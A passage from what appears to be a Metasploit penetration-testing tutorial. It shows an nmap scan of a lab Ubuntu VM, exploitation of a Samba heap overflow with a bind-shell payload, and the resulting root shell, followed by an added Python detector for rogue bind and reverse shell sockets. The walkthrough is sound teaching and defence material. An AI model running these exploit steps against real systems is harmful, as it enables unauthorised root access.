Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are pretty much the same as for the preceding exploit except that we will select a different payload.
msf > nmap -sT -A -P0 192.168.33.132
[*] exec: nmap -sT -A -P0 192.168.33.132

Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
. . . SNIP . . .

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOME\Unknown
|_  System time: 2011-03-15 17:39:57 UTC-4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds
We see three open ports: 80, 139, and 445. The nmap output tells us that the system is running Ubuntu, and the service banners show that it is running a version of Samba 3.x and Apache 2.2.3 with PHP 5.2.1.
Let’s search for a Samba exploit and try it against the system:
msf > search samba
[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========

   Name                                Rank    Description
   ----                                ----    -----------
   admin/smb/samba_symlink_traversal   normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap         normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap       normal  Samba lsa_io_trans_names Heap Overflow

Exploits
========

   Name                                Rank    Description
   ----                                ----    -----------
   linux/samba/lsa_transnames_heap     good    Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads

Compatible Payloads
===================

   Name                              Rank    Description
   ----                              ----    -----------
   generic/debug_trap                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp         normal  Generic Command Shell, Reverse TCP Inline
   linux/x86/adduser                 normal  Linux Add User
   linux/x86/chmod                   normal  Linux Chmod
   linux/x86/exec                    normal  Linux Execute Command
   linux/x86/metsvc_bind_tcp         normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp      normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/shell/bind_ipv6_tcp     normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_tcp          normal  Linux Command Shell, Bind TCP Stager
. . . SNIP . . .

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > exploit

[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
. . . SNIP . . .
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.33.129:41551 -> 192.168.33.132:8080)

ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:21:AD:08
          inet addr:192.168.33.132  Bcast:192.168.33.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3178 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:292351 (285.4 KiB)  TX bytes:214234 (209.2 KiB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

whoami
root
This type of exploit, called a heap-based attack, takes advantage of dynamic memory allocation, but it isn’t 100 percent reliable. (You may need to attempt the exploit command a few times if it doesn’t work the first time.)
Notice in this example that we used a bind shell to set up a listener port on the target machine; Metasploit handles the direct connection to the system automatically for us. (Remember to use the reverse payload when attacking through a firewall or NAT.)
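From the defender's side, the bind shell above leaves the exploited smbd process holding a listener on port 8080 (and an accepted connection on it), while a reverse payload would leave smbd with an outbound connection to a port it never normally talks to. The script below is an added example, not code from the book or from Metasploit: it parses constructed `ss -tanp`-style socket lines and flags any socket that a known daemon holds on a port outside its expected set, covering both the bind-shell case shown here and the reverse-shell case the text mentions. The sample lines, pids and the daemon-to-port baseline are all constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample in the style of `ss -tanp` on the exploited host (not captured
# output): smbd's normal listeners, the bind shell listening on 8080 with the attacker's
# connection accepted on it, and one line mimicking a reverse payload dialling out.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port      Process
LISTEN 0      50     0.0.0.0:139           0.0.0.0:*              users:(("smbd",pid=1234,fd=30))
LISTEN 0      50     0.0.0.0:445           0.0.0.0:*              users:(("smbd",pid=1234,fd=31))
LISTEN 0      1      0.0.0.0:8080          0.0.0.0:*              users:(("smbd",pid=1237,fd=5))
ESTAB  0      0      192.168.33.132:8080   192.168.33.129:41551   users:(("smbd",pid=1237,fd=5))
ESTAB  0      0      192.168.33.132:50213  192.168.33.129:4444    users:(("smbd",pid=1240,fd=5))
LISTEN 0      128    0.0.0.0:80            0.0.0.0:*              users:(("apache2",pid=900,fd=4))
"""

# Assumed baseline for this host: the ports each daemon is allowed to own.
EXPECTED_PORTS = {"smbd": {139, 445}, "nmbd": {137, 138}, "apache2": {80, 443}}

SOCKET_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<paddr>\S+):(?P<pport>\S+)\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def find_rogue_sockets(ss_output: str) -> List[Dict[str, object]]:
    """Flag sockets a known daemon holds on a port outside its expected set.
    A LISTEN on an unexpected port is the bind-shell pattern; an ESTAB with an
    unexpected local port covers the accepted bind connection and a reverse shell."""
    findings = []
    for line in ss_output.splitlines():
        m = SOCKET_RE.match(line)
        if not m:  # header line, or a socket with no process information
            continue
        proc, lport = m.group("proc"), int(m.group("lport"))
        if proc not in EXPECTED_PORTS or lport in EXPECTED_PORTS[proc]:
            continue
        findings.append({
            "state": m.group("state"),
            "proc": proc,
            "pid": int(m.group("pid")),
            "port": lport,
            "peer": f"{m.group('paddr')}:{m.group('pport')}",
        })
    return findings

if __name__ == "__main__":
    for f in find_rogue_sockets(SAMPLE_SS_OUTPUT):
        print(f"{f['state']:<7}{f['proc']} pid={f['pid']} port={f['port']} peer={f['peer']}")
```

Daemons that legitimately make outbound connections (for example smbd talking to a domain controller) would need their peer ports added to the baseline before this check is run on a real host.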